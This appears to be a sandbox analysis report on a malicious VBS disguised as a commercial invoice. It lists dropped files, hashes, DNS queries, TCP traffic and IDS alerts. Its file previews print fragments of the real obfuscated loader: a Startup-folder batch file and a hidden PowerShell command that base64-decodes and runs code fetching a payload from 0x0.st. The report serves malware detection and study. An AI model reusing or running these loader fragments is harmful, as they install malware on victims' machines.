                                      MD5:1253161AB88164ACED63B968FDA12398
                                      SHA1:B73D8097228AF78929B537B6207BE49DE663A4E4
                                      SHA-256:717B2E04CDC8C7252AA6C77B2204C2ED2BE1EFC3192345811B27B68E9E969105
                                      SHA-512:69C61264594BF4BE08C856BB240D6417699C75BA2513BAB2F00F19A74C3DFACAB8E1DD6C18CE43AE2A4E00F1E26EAD6B4EC4D244F5085D450364544BA0EDA43D
                                      Malicious:true
                                      Preview:%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%..%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n..%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"..%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"..%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE..%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)..::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1bt

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xr4qoj0.o3o.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cu2ketd.jsi.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwxddauu.qjh.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf3cujyf.ns4.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_masp55xm.dv4.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgz2f5ye.isx.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rc4lgvxs.m2l.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uq0qo4fa.fv4.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (48450), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):56561
                                      Entropy (8bit):6.027350559479858
                                      Encrypted:false
                                      SSDEEP:768:a9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/Ue5ZU:a9iQMGZXPvgXyFGT9Vilgvd7RB05OMuK
                                      MD5:1253161AB88164ACED63B968FDA12398
                                      SHA1:B73D8097228AF78929B537B6207BE49DE663A4E4
                                      SHA-256:717B2E04CDC8C7252AA6C77B2204C2ED2BE1EFC3192345811B27B68E9E969105
                                      SHA-512:69C61264594BF4BE08C856BB240D6417699C75BA2513BAB2F00F19A74C3DFACAB8E1DD6C18CE43AE2A4E00F1E26EAD6B4EC4D244F5085D450364544BA0EDA43D
                                      Malicious:true
                                      Preview:%WKBFIIKRWUUNZDG%@%WKBFIIKRWUUNZDG%e%WKBFIIKRWUUNZDG%c%WKBFIIKRWUUNZDG%h%WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG% %WKBFIIKRWUUNZDG%o%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%f%WKBFIIKRWUUNZDG%..%OAV%s%OAV%e%OAV%t%OAV%l%OAV%o%OAV%c%OAV%a%OAV%l%OAV% %OAV%e%OAV%n%OAV%a%OAV%b%OAV%l%OAV%e%OAV%d%OAV%e%OAV%l%OAV%a%OAV%y%OAV%e%OAV%d%OAV%e%OAV%x%OAV%p%OAV%a%OAV%n%OAV%s%OAV%i%OAV%o%OAV%n..%MWF%s%MWF%e%MWF%t%MWF% "GZTDNJ=%MWF%OULDEs%OULDEMWF%e%MWF%OULDEt%MWF%OULDE ZDZOULDEJ=1 &OULDE&OULDE %MWFOULDE%s%MWF%OULDEt%MWF%aOULDE%MWF%rOULDE%MWF%OULDEt%OULDEMWFOULDE%OULDE "" /OULDEminOULDE OULDE"..%WZQ%s%WZQ%e%WZQ%t%WZQ% "IVCXSO=&& OULDEexitOULDE"..%GUM%s%GUM%e%GUM%t%GUM% "AKMRNV=%GUM%nOULDE%GUMOULDE%OULDEo%GUM%OULDEt%GUMOULDE% %GUM%OULDEd%GUM%OULDEe%OULDEGUM%fOULDE%GUMOULDE%iOULDE%GUM%nOULDE%GUMOULDE%e%OULDEGUM%d%OULDEGUM%OULDE ZDOULDEZJOULDE..%OYV%i%OYV%f%OYV% %AKMRNV:OULDE=% (%GZTDNJ:OULDE=%%0 %IVCXSO:OULDE=%)..::KxTWIi9guyjF7tfG57+5GIF7QiGzRahVE/ZnciTu0akmSkYpWygbIG+SFSGFODecAh3n19LPuSyKsKyLFMGyxfYL8QjEGJlD2r5+1bt

                                      \Device\ConDrv

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (2521), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2523
                                      Entropy (8bit):5.874461665160376
                                      Encrypted:false
                                      SSDEEP:48:duo1KrhTBA0CboECaEO52CK75R8A336Ye1pRL18RTYRxdKB3bqjB3MqF1XXrrvfk:cOg4yIA3Pe1pdey7QBejBcGVrrrjFSFp
                                      MD5:3CE96D4D64179D91F8FF7C83323C5729
                                      SHA1:20A8BA79860A54E395A0AEBA48E1F30204A92D26
                                      SHA-256:4CB025A66DC6D0B84CE9DA3B440D83BA6322CCD8C52E11575017C7DB9191A34B
                                      SHA-512:03E63C3429BFAECA86F782E4408F083824E6EB4BC0D6F6D3950EBF3768255A918B09C02676B66B3A92E5FBFF19AADD510FEF4FD925C76E7D92181E8D503BA5E4
                                      Malicious:false
                                      Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSS

                                      Static File Info

                                      General

                                      File type:ASCII text, with very long lines (48468), with CRLF line terminators
                                      Entropy (8bit):6.0406775911938695
                                      TrID:
                                        File name:Commercial Invoice Confirmation-1132346.vbs
                                        File size:57'188 bytes
                                        MD5:f268af24198f756977b03b521f23e96c
                                        SHA1:b5ae78ce8541943b14f48c5003d0c2e306bfae96
                                        SHA256:ac3080be59227ea4650f78500acb8b8de9d2e51089b5d39475ba9b368731b8a6
                                        SHA512:c1fd961d00a1d1c619b224a224a08a29778908e406049845f5e55fbabc88bf34fa9eb3b1a810577f1b54cc89941bfea5dde530a262f7f33401a02b10a42de904
                                        SSDEEP:768:zU5lZeh9YLNQaBdGzFXP/3gXI6URGzFj85FGB9W3Q3ZhGAivdgcKd7RPZ125tA/v:V9iQMGZXPvgXyFGT9Vilgvd7RB05OMkX
                                        TLSH:8C43E1BB6D1DBB9A439819A926FE4B65C3FE0DA35052FF6B430D1A34DCA00935731C1A
                                        File Content Preview:Dim ePIyN : ePIyN = 2..Dim CVmVy : Set CVmVy = CreateObject("Scripting.FileSystemObject")..Dim GVuEO : GVuEO = CVmVy.GetSpecialFolder(2)....Dim pSoHg..pSoHg = "3h6QL1gQ.bat"..Set AdrDb = CVmVy.CreateTextFile(GVuEO & "\" & pSoHg, True)..AdrDb.writeline "%W

                                        File Icon

                                        Icon Hash:68d69b8f86ab9a86

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-02-18T08:24:33.715621+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849705168.119.145.117443TCP
                                        2025-02-18T08:24:35.435140+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849706132.226.247.7380TCP
                                        2025-02-18T08:24:49.980780+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.849710168.119.145.117443TCP
                                        2025-02-18T08:24:51.638349+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711132.226.247.7380TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 18, 2025 08:24:32.738419056 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:32.738476038 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:32.738545895 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:32.747381926 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:32.747400999 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.429362059 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.429603100 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.436177015 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.436217070 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.436553001 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.452857971 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.499335051 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715712070 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715779066 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715835094 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715857983 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.715888023 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715949059 CET44349705168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:33.715987921 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.716006041 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:33.734215021 CET49705443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:34.507503033 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:34.512386084 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:34.512455940 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:34.512546062 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:34.519918919 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:35.178303003 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:35.184533119 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:35.189343929 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:35.388596058 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:35.400558949 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.400597095 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.400765896 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.401160955 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.401177883 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.435139894 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:35.872539997 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.872905970 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.875875950 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.875897884 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.876287937 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.877547026 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.923333883 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.996979952 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.997143984 CET44349707104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:35.997200012 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:35.998895884 CET49707443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:49.015938044 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.015989065 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.016213894 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.019483089 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.019498110 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.683495998 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.683600903 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.688272953 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.688291073 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.688735962 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.695050955 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.739336014 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.980823040 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.980905056 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.980969906 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.981018066 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:49.981060028 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.981096029 CET44349710168.119.145.117192.168.2.8
                                        Feb 18, 2025 08:24:49.981142998 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:50.317517042 CET49710443192.168.2.8168.119.145.117
                                        Feb 18, 2025 08:24:50.689588070 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:50.694606066 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:50.694684982 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:50.694785118 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:50.699814081 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:51.362696886 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:51.365309000 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:51.370155096 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:51.587985039 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:24:51.589502096 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:51.589561939 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:51.589632988 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:51.589929104 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:51.589942932 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:51.638349056 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:24:52.049384117 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.049480915 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:52.050787926 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:52.050821066 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.051177025 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.052387953 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:52.095328093 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.183274984 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.183387995 CET44349712104.21.16.1192.168.2.8
                                        Feb 18, 2025 08:24:52.183451891 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:24:52.183835983 CET49712443192.168.2.8104.21.16.1
                                        Feb 18, 2025 08:25:03.529315948 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:25:03.534362078 CET8049711132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:25:03.534429073 CET4971180192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:25:40.388809919 CET8049706132.226.247.73192.168.2.8
                                        Feb 18, 2025 08:25:40.388890982 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:26:15.404525995 CET4970680192.168.2.8132.226.247.73
                                        Feb 18, 2025 08:26:15.410084009 CET8049706132.226.247.73192.168.2.8

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 18, 2025 08:24:32.718616009 CET5625553192.168.2.81.1.1.1
                                        Feb 18, 2025 08:24:32.732043982 CET53562551.1.1.1192.168.2.8
                                        Feb 18, 2025 08:24:34.498658895 CET5803353192.168.2.81.1.1.1
                                        Feb 18, 2025 08:24:34.506557941 CET53580331.1.1.1192.168.2.8
                                        Feb 18, 2025 08:24:35.389699936 CET5943653192.168.2.81.1.1.1
                                        Feb 18, 2025 08:24:35.399945974 CET53594361.1.1.1192.168.2.8

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Feb 18, 2025 08:24:32.718616009 CET192.168.2.81.1.1.10x477fStandard query (0)0x0.stA (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.498658895 CET192.168.2.81.1.1.10xf30bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.389699936 CET192.168.2.81.1.1.10x67c6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Feb 18, 2025 08:24:32.732043982 CET1.1.1.1192.168.2.80x477fNo error (0)0x0.st168.119.145.117A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:34.506557941 CET1.1.1.1192.168.2.80xf30bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                        Feb 18, 2025 08:24:35.399945974 CET1.1.1.1192.168.2.80x67c6No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • 0x0.st
                                        • reallyfreegeoip.org
                                        • checkip.dyndns.org

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
